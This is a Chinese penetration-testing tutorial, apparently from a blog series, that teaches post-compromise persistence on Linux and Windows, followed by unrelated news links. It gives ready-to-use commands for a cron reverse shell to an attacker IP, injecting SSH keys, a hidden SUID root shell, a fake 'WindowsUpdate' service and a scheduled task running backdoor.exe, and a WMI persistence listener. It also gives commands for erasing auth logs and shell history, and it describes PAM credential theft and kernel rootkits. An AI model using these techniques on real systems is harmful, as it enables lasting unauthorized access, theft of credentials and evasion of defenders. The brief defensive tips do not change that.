撤出之后如何“随时回来”?权限维持的5种姿势(第十一弹·权限维持篇)
你辛辛苦苦拿下了域控结果第二天运维发现漏洞打了个补丁你的Webshell被删了、账号被禁了——一切归零。真相是没有权限维持的渗透等于“一次性参观券”。全文约2100字阅读约7分钟。今天教你如何在撤出之后还能“随时回来”。一、先讲一个真实故事一个计划任务“潜伏”了427天某大型企业的红蓝对抗演练中蓝队防守方花了整整14个月才把红队的所有后门清理干净。红队做了什么很简单——他们在第一台失陷的Linux服务器上写了一个每72小时执行一次的cron计划任务。任务内容是从一个隐蔽的GitHub仓库下载并执行一个反弹Shell脚本。蓝队清理了Webshell、修补了漏洞、重置了密码——但漏掉了这个cron任务。14个月后在一次季度巡检中才偶然发现。而这14个月里红队随时可以“复活”。这就是权限维持的威力你不需要永远在线只要留一把“后门钥匙”想什么时候回来就什么时候回来。二、权限维持到底是什么说人话官方定义权限维持Persistence是指攻击者在成功获取系统访问权限后采取一系列技术手段确保其能够在后续任意时间点重新获得对目标系统的控制权即使在系统重启、补丁更新或账户密码变更后仍能保持访问能力。说人话就是一句话给自己留一把“万能钥匙”随时能再进来。想象一下你是一个小偷撬开了银行金库的门拿到了权限。但你不可能一直待在金库里——你要撤走。撤走之前你在金库的通风管道里藏了一把备用钥匙后门。下次你想来的时候不用再撬门直接掏钥匙进来就行。有权限维持你是“业主”没有权限维持你是“游客”。三、Linux权限维持7种姿势从入门到“隐形” 姿势一计划任务后门Cron——最经典、最稳定原理利用Linux的cron定时任务定期执行恶意脚本。一句话后门bashecho */10 * * * * root /bin/bash -c bash -i /dev/tcp/你的IP/端口 01 /etc/crontab每10分钟反弹一次Shell你随时都能连回来。 高级玩法把脚本存在/dev/shm/内存目录重启就消失但cron任务还在脚本没了会自动重新下载。 姿势二SSH免密登录——最“合法”的后门原理把自己的公钥写入目标服务器的~/.ssh/authorized_keys。bashecho ssh-rsa AAAAB3NzaC1yc2EAAA... ~/.ssh/authorized_keys运维查日志只能看到“正常SSH登录”——完全合法无法察觉。 高级玩法不只留~/.ssh/authorized_keys还要留一条SSH连接复用——~/.ssh/config里配置ControlMaster即使换了公钥也能复用已建立的连接。 姿势三SUID后门——“合法程序”藏玄机原理给一个常见系统命令如find设置SUID位让它执行时拥有root权限。bashcp /bin/bash /bin/.hidden_bash chmod 4755 /bin/.hidden_bash运行时/bin/.hidden_bash -p→直接获得root shell。运维看到的是“一个系统进程在运行”根本不会起疑。 姿势四PAM后门——SSH登录直接“偷密码”原理修改PAM认证模块文件让SSH登录时把你的密码记录下来同时还能正常登录系统。这是顶级后门——你连系统都不用进去每次有人SSH登录密码就自动发到你的邮箱或日志文件里。 姿势五内核模块后门LKM——最隐蔽、最难查原理加载一个恶意内核模块LKM在内核层面隐藏进程、文件、网络连接。你开着后门netstat看不到、ps看不到、ls看不到——就好像“隐身”一样。防御方想查你必须重启系统或者拆机取证。 姿势六inotify后门——文件变化自动触发的潜伏者原理利用inotify机制监控文件变化一旦有文件变化就触发执行恶意代码。比如监控/etc/passwd——只要有人修改密码文件你就弹一个Shell。 姿势七日志清理与痕迹消除——后门的第一守护者核心命令history -c清当前记录unset HISTFILE禁止后续记录sed -i /可疑IP/d /var/log/auth.log删除登录日志。最后记得清理~/.bash_history让运维复查时什么都找不到。四、Windows权限维持5种姿势从入门到“影分身” 姿势一自启动项Startup Folder——最简单的“复活甲”原理把恶意程序放在“启动”文件夹用户每次登录都会自动执行。路径用户级C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\系统级C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\只要放一个exe进去每次开机自动上线。 姿势二注册表自启动——最经典的“开机自启”原理在注册表的特定键值下写入恶意程序路径。三个最常用的位置textHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceRun和RunOnce的区别Run是每次开机都运行RunOnce是只在下次重启时运行一次适合“一次性潜伏”场景。 姿势三Windows服务后门——最“正规”的伪装原理创建一个系统服务伪装成系统组件开机自动启动。用sc命令创建cmdsc create WindowsUpdateService binPath C:\Windows\Temp\backdoor.exe start auto运维在服务列表里看到的是一个叫“WindowsUpdate”的服务谁会怀疑 姿势四计划任务后门——最灵活的定时器原理和Linux的cron一样创建计划任务定期执行。cmdschtasks /create /tn 系统维护 /tr C:\Windows\Temp\backdoor.exe /sc daily /st 02:00每天凌晨2点执行你睡醒就有Shell。 姿势五WMIWindows Management Instrumentation后门——最隐蔽的“无文件攻击”原理通过WMI在系统里注册一个永久事件监听器不写文件、不写注册表、只在内存里运行。powershell# 创建永久WMI事件监听器 Register-WmiEvent -Query SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA Win32_ProcessStartup -Action { 反弹Shell代码 }杀毒软件扫不到、运维肉眼查不到、重启后自动恢复——只有内存取证才能发现。五、红队的“终极奥义”三层后门体系层级形式特点表层后门WebShell、自启动项容易被发现用于第一波进入中层后门计划任务、服务、注册表有一定隐蔽性清理需要一定技术深层后门LKM、PAM后门、WMI永久事件极难发现需要专业工具和深入分析高手从不只留一个后门——他们会留一套“后门体系”。你清理了WebShell表层我还有计划任务中层在10分钟后重建它你清理了计划任务中层我还有WMI深层在5分钟后重建计划任务。六、怎么防给防御方的3条核心建议① 基线监控对比系统服务的“黄金镜像”任何偏离基线的新增服务、任务、启动项都要告警。② 日志审计重点关注/var/log/auth.log和Windows安全日志4624、4672事件中的非正常时间登录行为。③ 终端检测与响应EDR现代EDR能检测内存中的恶意行为和异常进程链——传统杀毒软件防不住的后门EDR可以。七、学习资源包 推荐靶场VulnHub的FRISTILEAKS、Mr-Robot涉及多种权限维持手法以及TryHackMe的Persistence专项房间。 推荐阅读FreeBuf搜索“权限维持”标签大量实战案例以及《红队之道持久化访问技术手册》。️ 必装工具Linux下用chkrootkit/rkhunter检测后门Windows下用Autoruns、TCPView排查自启动。写在最后SQL注入是“进门”文件上传是“送武器”提权是“夺权”横向移动是“攻城略地”——权限维持是“修建永久工事”。没有权限维持你的一切努力都是“一次性”的。有了权限维持你的每一次渗透都在为下一次渗透积累“资本”。今天这篇文章我带你从Linux到Windows从表层后门到深层后门走了一遍。真正的渗透高手不是“能进来”而是“想什么时候进来就什么时候进来”。—— 手把手带你上路的网安教练下一期预告第十二弹·结束也是开始——《从0到1如何用6个月找到你的第一份网络安全工作》。这个系列到今天就暂时告一段落了最后一篇送你一份完整的求职实战地图记得来看。

相关新闻

智能无人机(UAV)影像单株树木健康评估检测数据集无人机航拍树木数据集、YOLOv11树木检测数据集、树木折断识别、枯死树木检测、多季节林地数据、智慧林业AI数据集树木健康检测、林业巡检

智能无人机(UAV)影像单株树木健康评估检测数据集无人机航拍树木数据集、YOLOv11树木检测数据集、树木折断识别、枯死树木检测、多季节林地数据、智慧林业AI数据集树木健康检测、林业巡检

智能航拍无人机(UAV)影像单株树木健康评估检测数据集 无人机拍摄的高分辨率影像数据,涵盖了不同季节和天气条件下的森林区域,700余张高分辨率无人机图像(1293*1293左右),采用yolo格式标注&#…

2026/8/25 12:34:58 阅读更多 →
数字信号处理实验:AD7606采样与FFT频谱分析实践

数字信号处理实验:AD7606采样与FFT频谱分析实践

1. 实验背景与核心目标在数字信号处理的教学实践中,信号的抽样定理是最基础也是最重要的理论之一。这个实验通过国产教学实验箱的硬件平台,让学生直观理解模拟信号如何通过采样转换为数字信号,以及如何通过离散采样点重建原始信号。实验箱采用…

2026/8/24 16:18:53 阅读更多 →
紫光同创PDS开发环境入门与FPGA设计实践

紫光同创PDS开发环境入门与FPGA设计实践

1. 认识紫光同创PDS开发环境作为一名FPGA工程师,第一次接触紫光同创的Pango Design Suite(PDS)时,最直观的感受就是它与其他主流EDA工具(如Vivado或Quartus)在界面布局和操作逻辑上的差异。PDS作为国产FPGA…

2026/8/24 10:37:33 阅读更多 →

最新新闻

芯片制造全流程解析:从硅晶圆到集成电路的精密之旅

芯片制造全流程解析:从硅晶圆到集成电路的精密之旅

1. 项目概述:从一粒沙到一颗“芯”的旅程你可能每天都在使用手机、电脑,但有没有想过,驱动这些设备的“大脑”——芯片,究竟是怎么来的?它可不是凭空变出来的,而是从我们身边最常见的沙子开始,经…

2026/8/26 10:06:00 阅读更多 →
Gemini CLI停服后,如何用Python快速构建私有AI命令行工具

Gemini CLI停服后,如何用Python快速构建私有AI命令行工具

1. 项目概述:一个时代的终结与开发者的新起点“谷歌官宣:Gemini CLI彻底倒下了”——这个消息在开发者社区里,像一颗投入平静湖面的石子,激起了不小的涟漪。如果你是一位习惯在终端里敲敲打打,用命令行工具&#xff08…

2026/8/26 10:04:58 阅读更多 →
基于FastAPI与LiteLLM构建统一多模型推理服务:从本地Ollama到云端API

基于FastAPI与LiteLLM构建统一多模型推理服务:从本地Ollama到云端API

1. 项目概述:为什么要把本地模型搬到线上?最近几个月,我身边不少搞AI应用开发的朋友都在琢磨同一件事:自己用Ollama在本地跑通了大模型,效果不错,成本也低,但怎么才能让团队里的其他人、或者自己…

2026/8/26 10:04:58 阅读更多 →
AI Agent如何重塑职场:从工具到同事的协同进化

AI Agent如何重塑职场:从工具到同事的协同进化

1. 项目概述:当AI从“工具”进化为“同事”最近和几个不同行业的朋友聊天,发现一个挺有意思的现象。做市场策划的朋友,以前写个活动方案要憋好几天,现在用AI工具,半天就能出个初稿,还能生成好几个不同风格的…

2026/8/26 10:04:58 阅读更多 →
MES系统核心功能解析:从数据采集到生产追溯的智能制造中枢

MES系统核心功能解析:从数据采集到生产追溯的智能制造中枢

1. 项目概述:为什么今天的企业绕不开MES? 干了十几年制造业信息化,从最早的车间看板到现在的智能工厂,我最大的感受是: 生产现场的黑箱问题,永远是老板和管理者最头疼的。 你问车间主任今天到底能产出多少…

2026/8/26 10:04:58 阅读更多 →
C++泛型编程实战:系统级工程中的模板设计与避坑指南

C++泛型编程实战:系统级工程中的模板设计与避坑指南

1. 这不是语法手册,是系统工程师每天要写的代码逻辑 C泛型编程不是教科书里“模板就是把类型参数化的语法糖”这种轻飘飘的定义。它是我过去八年在车载中间件、工业实时控制和金融高频交易系统里,每天和编译器较劲、和内存对齐搏斗、和ABI兼容性扯皮的核…

2026/8/26 10:04:58 阅读更多 →

日新闻

Python random 模块常用函数详解:从入门到实战

Python random 模块常用函数详解:从入门到实战

目录 1. 引言2. 准备工作3. 基础随机函数4. 序列相关函数5. 随机种子与复现6. 实战案例7. 注意事项8. 常见问题与排查9. 总结 1. 引言 摘要: 本文系统介绍 Python 标准库 random 模块中最常用的随机数生成函数。内容涵盖基础随机函数(random()、unifor…

2026/8/26 0:00:40 阅读更多 →
《Microsoft Sql server 2008 Internals》读书笔记--第三章Databases and Database Files(2)

《Microsoft Sql server 2008 Internals》读书笔记--第三章Databases and Database Files(2)

《Microsoft Sql server 2008 Internals》索引目录: 《Microsoft Sql server 2008 Internals》读书笔记--目录索引 在上篇文章中,主要介绍了创建数据库的基本语法和FileGroup的初步知识。需要注意的是: 关于FileGroup 如果你的系统是用Raid设备直接存…

2026/8/26 1:18:18 阅读更多 →
政务AI智能体怎么建?三种模式、三步路径与四个误区

政务AI智能体怎么建?三种模式、三步路径与四个误区

政务AI智能体已经从概念试点阶段,转入了政务服务的常态化落地应用;在实际使用过程中,它能自主理解办事需求、辅助完成填报申报、开展材料预审,并联动多个系统协同作业,真正嵌入到政务办理的全流程当中。但在落地推进过…

2026/8/26 1:18:18 阅读更多 →

周新闻

[光学原理与应用-521]:对光的错误理解与纠偏

[光学原理与应用-521]:对光的错误理解与纠偏

首先光是一种能量的载体和形态,宏观上观察到的光是由无数个微观的光量子组成的,每个光子在产生的瞬间,其在真空的空间中以确定不变的速度沿着一个初始的方向一直向前,在微观层面,每个光量子的运动轨迹是以波函数所展现…

2026/8/25 3:38:12 阅读更多 →
SIP通话转接原理与REFER方法实战解析

SIP通话转接原理与REFER方法实战解析

1. 通话转接不是“挂断再拨号”,而是SIP会话的动态重定向你有没有遇到过这样的场景:客服坐席A正在和客户通电话,突然需要把这通对话无缝转给专家坐席B,客户完全感知不到中间的断连——既没听到忙音,也没被要求重新拨号…

2026/8/25 3:38:18 阅读更多 →
Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

1. 为什么选择Kolla-ansible来部署单节点OpenStack?如果你正在寻找一种能把OpenStack从“概念”快速变成“可用的实验环境”的方法,那么Kolla-ansible几乎是当前最主流、最省心的选择。我见过太多人卡在手动编译依赖、配置服务、处理版本冲突的泥潭里&am…

2026/8/25 3:38:23 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/26 3:50:20 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/25 10:31:12 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/26 1:24:05 阅读更多 →